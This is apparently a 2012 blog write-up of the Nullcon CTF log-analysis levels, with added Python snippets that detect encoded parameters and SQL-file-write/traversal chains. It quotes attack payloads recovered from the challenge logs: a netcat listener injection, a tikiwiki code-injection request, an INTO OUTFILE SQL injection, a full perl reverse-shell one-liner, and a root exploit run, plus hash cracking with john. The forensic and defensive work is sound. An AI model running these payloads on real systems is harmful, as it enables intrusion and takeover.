Tuesday, 17 January 2012

Nullcon 2012 Writeup on Log Analysis

The log analysis levels were straightforward, but maybe there are still some people who are interested in the solution.

Level1 (Analysing the Nikto report file)

You will quickly notice that there is a line containing the challenge path.
+ OSVDB-3268: GET /challenge/logically_insane/  : Directory indexing is enabled: /challenge/logically_insane/

After navigating to this folder, you will see a (fake) directory listing with askmelater.asp inside.

After navigating to this file and watching the directory listing, you get the hint "Ask the proper question to get the proper answer" and the parameter information askmelater.asp?question=?

Using flag as the parameter value, you get the flag: 6bb61e3b7bce0931da574d19d1d82c88 <-- this is generated, so your flag may be something else

Level2 (Analysing the pcap file)

This was more about manually scrolling through the packets in Wireshark and looking into the contents. After reaching packet number 28, you see the response of a select and the password ..Supp@..adm1n, which is the flag.

Level3 (Analysing the 25M access log)

Some web scanner flooded the logs, so you cannot go through them by scrolling.
What I did was just look at the question: we need the attacker IP, so I filtered all IPs first.

$ cat access.log | awk '{print $1}' | sort | uniq
127.0.0.1
192.168.0.105
192.168.0.107
192.168.0.110


Afterwards I filtered by IP and was hoping that the shortest log would have the answer.

$ cat access.log | grep 192.168.0.107
192.168.0.107 - - [] "GET /index.php HTTP/1.1" 200 1364
192.168.0.107 - - [] "GET /javascript/jquery.js HTTP/1.1"
192.168.0.107 - - [] "GET /javascript/common.js HTTP/1.1"
192.168.0.107 - - [] "GET /Contacts.php HTTP/1.1"
192.168.0.107 - - [] "GET /add-contact.php HTTP/1.1"
192.168.0.107 - - [] "GET /search.php HTTP/1.1"
192.168.0.107 - - [] "GET /search.php HTTP/1.1"
192.168.0.107 - - [06/Jan/2012:00:58:00 +0530] "GET /contact.php?c=bmMgLWwgLXAgNjY2Ng== HTTP/1.1" 500 274 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"


And truly, the answer is inside the shortest log.

base64decode("bmMgLWwgLXAgNjY2Ng==") == nc -l -p 6666

The attacker is coming from 192.168.0.107 and uses contact.php to start netcat on port 6666.
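The same triage as a script, as an added example that is not part of the original writeup: it orders client IPs by request count, fewest first, and decodes query values that are valid base64. The function names and all sample lines except the last one are constructed for illustration.

```python
import base64
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed sample in the access.log format; only the last line is from the page.
SAMPLE_LOG = """\
192.168.0.105 - - [06/Jan/2012:00:50:01 +0530] "GET /admin/ HTTP/1.1" 404 210 "-" "scanner"
192.168.0.105 - - [06/Jan/2012:00:50:02 +0530] "GET /backup.zip HTTP/1.1" 404 210 "-" "scanner"
192.168.0.105 - - [06/Jan/2012:00:50:03 +0530] "GET /search.php?q=test HTTP/1.1" 200 512 "-" "scanner"
192.168.0.110 - - [06/Jan/2012:00:51:00 +0530] "GET /index.php HTTP/1.1" 200 1364 "-" "Mozilla/5.0"
192.168.0.107 - - [06/Jan/2012:00:58:00 +0530] "GET /contact.php?c=bmMgLWwgLXAgNjY2Ng== HTTP/1.1" 500 274 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "\S+ (\S+)[^"]*"')

def parse(log_text):
    """Yield (client IP, request target) for each line in combined log format."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.group(1), m.group(2)

def quietest_first(log_text):
    """Client IPs with request counts, fewest first, so scanner noise sinks to the end."""
    counts = Counter(ip for ip, _ in parse(log_text))
    return sorted(counts.items(), key=lambda kv: (kv[1], kv[0]))

def decode_b64(value):
    """Return the decoded text if value is strict base64 of printable ASCII, else None."""
    value = value.replace(" ", "+")  # parse_qsl turns a literal '+' into a space
    if len(value) < 8 or len(value) % 4:
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    return text if text.isprintable() else None

def encoded_params(log_text):
    """Return (ip, path, parameter, decoded) for query values that decode cleanly."""
    hits = []
    for ip, target in parse(log_text):
        url = urlsplit(target)
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            decoded = decode_b64(value)
            if decoded:
                hits.append((ip, url.path, name, decoded))
    return hits
```

Ordinary alphanumeric values can decode to printable text by coincidence, so treat the hits as leads to review rather than verdicts.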

Level4 (Analysing the Burp session log)

Unfortunately I don't have a full version of Burp, so I couldn't load the logfile into the application.

As in level3, I first tried to identify the attacker by sorting on a unique attribute. I randomly chose the User-Agent for this.

$ cat burp.log | grep User-Agent | sort | uniq
User-Agent: Internet Explorer 6.0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1


IE6 is running, so I thought this could be a client-side exploit. After manually looking into the file using vi, I recognized that there is a command execution.

POST /tikiwiki/scripts/server.php HTTP/1.1^M
TE: deflate,gzip;q=0.3^M
Connection: TE, close^M
Host: 192.168.221.154^M
User-Agent: Internet Explorer 6.0^M
Content-Length: 360^M
^M
foo.bar1111','')); system('id
'); die; /*



I googled for "tikiwiki server.php code execution" and found the CVE number.
Flag: CVE-2005-1921

Level5 (Analysing the 93M pcapng file)

We have to find 4 flags this time.
Flag-I: Vulnerable Parameter in 1st Attack
Flag-II: Vulnerable Parameter in 2nd Attack
Flag-III: Names of the people who discovered the Local Privilege Escalation Exploit used
Flag-IV: root Password


I started with the last part: somebody uses local root exploits, so there should be traces of this.

$ strings dump.pcapng | grep root
...
root:$1$IW2CPQzs$ba/aJ9zePc/r9tF2R6KAJ0:15350:0:99999:7:::
...
** Linux kernel 2.4/2.6 (32bit) sock_sendpage() local ring0 root exploit (simple ver)
ggcc 9479.c -o root
./root
uid=0(root) gid=0(root) groups=48(apache) context=system_u:system_r:httpd_sys_script_t
...


The sock_sendpage() exploit can quickly be found on exploit-db, where you can see the line "Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team."

Flag3 is found, now search for the others.

Guessing it is a web exploit, I did a grep for "GET" and found the following lines.

GET /index.html?page=blog&title=Blog&id=2+AND+1=2+UNION+ALL+SELECT+1,'',3,4,5+INTO+OUTFILE '/tmp/test2.txt'--+- HTTP/1.1

GET /index.html?page=../../../../../../../../../tmp/test2.txt&c=perl -e 'use Socket;$i="192.168.221.130";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'


What can we see here?
The first request is an SQL-Injection writing the line "" into the file "/tmp/test2.txt"

The second request is using a directory traversal bug to execute the test2.txt file, which should execute the perl connect shell.

We see that the attacker has the IP 192.168.221.130 and listens on port 4444.

Our first flag is id and the second one is page.
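A detection-side sketch of the same reasoning, added here and not part of the original writeup: it reports which parameter carries the SQL file-write or traversal signature and links a file written via INTO OUTFILE to a later parameter that resolves to it. The function names, the benign third request and the placeholder for the c= value are assumptions.

```python
import posixpath
import re
from urllib.parse import unquote_plus

# Request targets as recovered with grep. [0] is from the page, [1] is the page's second
# request with the c= value replaced by a placeholder, [2] is a constructed benign request.
REQUESTS = [
    "/index.html?page=blog&title=Blog&id=2+AND+1=2+UNION+ALL+SELECT+1,'',3,4,5+INTO+OUTFILE '/tmp/test2.txt'--+-",
    "/index.html?page=../../../../../../../../../tmp/test2.txt&c=PLACEHOLDER_COMMAND",
    "/index.html?page=blog&title=Blog&id=2",
]

OUTFILE_RE = re.compile(r"\bunion\b.+\bselect\b.+\binto\s+(?:out|dump)file\s+'([^']+)'", re.I | re.S)
TRAVERSAL_RE = re.compile(r"(?:\.\./){2,}")

def split_params(target):
    """Yield (name, decoded value) pairs; tolerates '=' and raw spaces inside values."""
    for chunk in target.partition("?")[2].split("&"):
        name, _, value = chunk.partition("=")
        yield name, unquote_plus(value)

def flag_parameters(targets):
    """Return (request index, parameter, signature) for every suspicious value."""
    findings = []
    for idx, target in enumerate(targets):
        for name, value in split_params(target):
            if OUTFILE_RE.search(value):
                findings.append((idx, name, "sql-file-write"))
            if TRAVERSAL_RE.search(value):
                findings.append((idx, name, "path-traversal"))
    return findings

def written_then_included(targets):
    """Correlate files written via INTO OUTFILE with later parameters resolving to them."""
    written, chain = {}, []
    for idx, target in enumerate(targets):
        for name, value in split_params(target):
            m = OUTFILE_RE.search(value)
            if m:
                written[m.group(1)] = idx
            resolved = posixpath.normpath("/" + value.lstrip("/"))  # collapse ../ at the root
            if resolved in written and written[resolved] < idx:
                chain.append((written[resolved], idx, name, resolved))
    return chain

if __name__ == "__main__":
    print(flag_parameters(REQUESTS))
    print(written_then_included(REQUESTS))
```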

I've loaded the pcapng file into Wireshark and set the filter "ip.addr==192.168.221.130 && tcp.port==4444"

The full shell log can be found here

I couldn't find the root password inside the network dump, so I started john.
$ john nullcon.tmp
Loaded 1 password hash (FreeBSD MD5 [32/64 X2])

After some time: zuzana




For corrections and other feedback send me an e-mail to bashrc at intruded dot net
